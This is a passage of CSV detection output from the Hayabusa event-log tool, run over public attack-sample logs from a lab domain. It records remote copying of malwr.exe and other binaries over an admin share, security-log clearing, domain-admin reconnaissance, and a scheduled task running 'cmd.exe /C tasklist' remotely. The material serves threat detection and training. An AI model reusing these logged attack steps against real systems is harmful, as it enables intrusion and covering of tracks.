0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.081 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
